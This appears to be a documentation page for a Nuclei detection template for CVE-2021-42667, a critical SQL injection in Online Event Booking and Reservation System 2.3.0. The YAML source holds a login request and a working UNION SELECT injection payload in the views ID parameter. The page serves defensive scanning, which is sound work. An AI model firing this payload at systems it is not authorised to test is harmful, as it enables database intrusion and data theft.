Skip to content
Nuclei Templates

Online Event Booking and Reservation System 2.3.0 - SQL Injection

ID: CVE-2021-42667

Severity: critical

Author: fxploit

Tags: cve,cve2021,sqli,authenticated,online_event_booking_and_reservation_system_project

Description

Section titled “Description”

Online Event Booking and Reservation System 2.3.0 contains a SQL injection vulnerability in event-management/views. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.

YAML Source

Section titled “YAML Source”
id: CVE-2021-42667


info:
  name: Online Event Booking and Reservation System 2.3.0 - SQL Injection
  author: fxploit
  severity: critical
  description: |
    Online Event Booking and Reservation System 2.3.0 contains a SQL injection vulnerability in event-management/views. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Apply the latest patch or update to a non-vulnerable version of the Online Event Booking and Reservation System.
  reference:
    - https://github.com/0xDeku/CVE-2021-42667
    - https://www.sourcecodester.com/php/14241/online-event-booking-and-reservation-system-phpmysql.html
    - https://github.com/TheHackingRabbi/CVE-2021-42667
    - https://nvd.nist.gov/vuln/detail/CVE-2021-42667
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-42667
    cwe-id: CWE-89
    epss-score: 0.04318
    epss-percentile: 0.91499
    cpe: cpe:2.3:a:online_event_booking_and_reservation_system_project:online_event_booking_and_reservation_system:2.3.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: online_event_booking_and_reservation_system_project
    product: online_event_booking_and_reservation_system
  tags: cve,cve2021,sqli,authenticated,online_event_booking_and_reservation_system_project
variables:
  num: "999999999"


http:
  - raw:
      - |
        POST /login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        name={{username}}&pwd={{password}}
      - |
        GET /views/?v=USER&ID=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2Cmd5({{num}})%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%3B--%20- HTTP/1.1
        Host: {{Hostname}}


    host-redirects: true
    max-redirects: 2


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5(num)}}'


      - type: status
        status:
          - 200
# digest: 4b0a00483046022100dc8d5bb5b305c1a0731fcfddad4d2ec36f6db60db4d838fdd680b4d74ef9bfd9022100b07997aeb0a2d733a3ad740ef79959ab9f7c484dfbbd7c152595104de10167e3:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-42667.yaml"

View on Github